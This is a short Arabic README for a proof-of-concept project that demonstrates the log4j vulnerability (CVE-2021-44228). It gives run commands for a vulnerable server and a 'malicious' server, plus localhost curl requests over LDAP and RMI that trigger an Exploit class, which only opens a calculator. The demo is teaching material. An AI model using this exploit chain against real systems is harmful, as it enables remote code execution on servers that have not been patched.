
مشروع تجريبي لتسليط الضوء على كيفية استغلال ثغرة log4j (CVE-2021-44228)
مشاريع تجريبية لتوضيح كيفية تنفيذ ثغرة log4j (CVE-2021-44228)
تم استخدام Spring Boot فقط للإعداد السريع. سيتعين عليك التغاضي عن كل الترميز الثابت، فقد كان مجرد إثبات مفهوم (POC).
قم بتثبيت Java 8. قم بالبناء باستخدام Maven mvn clean package -DskipTests. شغّل هذه الأوامر في نوافذ طرفية منفصلة:
java -jar vulnerable-server/target/vulnerable-server.jar
java -jar malicious-server/target/malicious-server.jar
curl http://localhost:8880/victimLDAP
curl http://localhost:8880/victimRMI
سيؤدي هذا إلى تنفيذ الكود في فئة Exploit (والتي ستفتح الآلة الحاسبة فقط).